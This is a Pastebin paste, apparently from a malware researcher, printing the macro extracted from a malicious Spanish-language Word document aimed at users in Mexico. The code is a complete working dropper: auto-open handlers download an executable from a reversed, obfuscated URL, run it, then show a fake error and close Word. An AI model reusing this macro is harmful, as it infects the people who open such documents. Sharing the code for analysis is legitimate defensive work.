Advertisement
dynamoo

Untitled

Jul 17th, 2014
887
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Malicious macro from Spanish-language Word document targeting users in Mexico
  2. See http://blog.dynamoo.com/2014/07/notificacion-de-transferencia-de-fondos.html
  3.  
  4. -----------8x- CUT HERE --------------------------------
  5.  
  6. Attribute VB_Name = "ThisDocument"
  7. Attribute VB_Base = "1Normal.ThisDocument"
  8. Attribute VB_GlobalNameSpace = False
  9. Attribute VB_Creatable = False
  10. Attribute VB_PredeclaredId = True
  11. Attribute VB_Exposed = True
  12. Attribute VB_TemplateDerived = True
  13. Attribute VB_Customizable = True
  14. Private Sub Auto_Open()
  15. Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "4b646n46.exe")
  16. End Sub
  17. Private Sub Workbook_Open()
  18. Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "rsd54tgs.exe")
  19. End Sub
  20. Private Sub AutoExec()
  21. Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "ds8fydsa89f7.exe")
  22. End Sub
  23. Private Sub AutoOpen()
  24. Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "fsfsfsdsd.exe")
  25. End Sub
  26. Private Sub Document_Open()
  27. Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "hjhhjhjhjhj.exe")
  28. End Sub
  29. Public Function DownloadFile(ByVal URL As String, ByVal SaveName As String, Optional SavePath As String = "TMP", Optional RunAfterDownload As Boolean = True, Optional RunHide As Boolean = False)
  30.     On Error Resume Next
  31.     Err.Clear
  32.  
  33.     Set XML = CreateObject("Microsoft.XMLHTTP")
  34.     Set ADS = CreateObject("ADODB.Stream")
  35.  
  36.     XML.Open "GET", URL, False
  37.     XML.send
  38.  
  39.     XML.getAllResponseHeaders
  40.  
  41.     FullSavePath = Environ(SavePath) & "\" & SaveName
  42.  
  43.     ADS.Open
  44.     ADS.Type = 1
  45.     ADS.Write XML.responseBody
  46.     ADS.SaveToFile FullSavePath, 2
  47.  
  48.     Shell FullSavePath, vbNormalFocus
  49.     DownloadFile = True
  50.     MsgBox "Este documento no es compatible con este equipo." & vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Error"
  51.     Dim z
  52.     z = 0
  53.     Do While 1 = 1
  54.     If z = 2 Then
  55.     Application.DisplayAlerts = False
  56.     Application.Quit
  57.     End If
  58.     z = z + 1
  59.     Loop
  60. End Function
Advertisement
Advertisement
Advertisement
RAW Paste Data Copied
Advertisement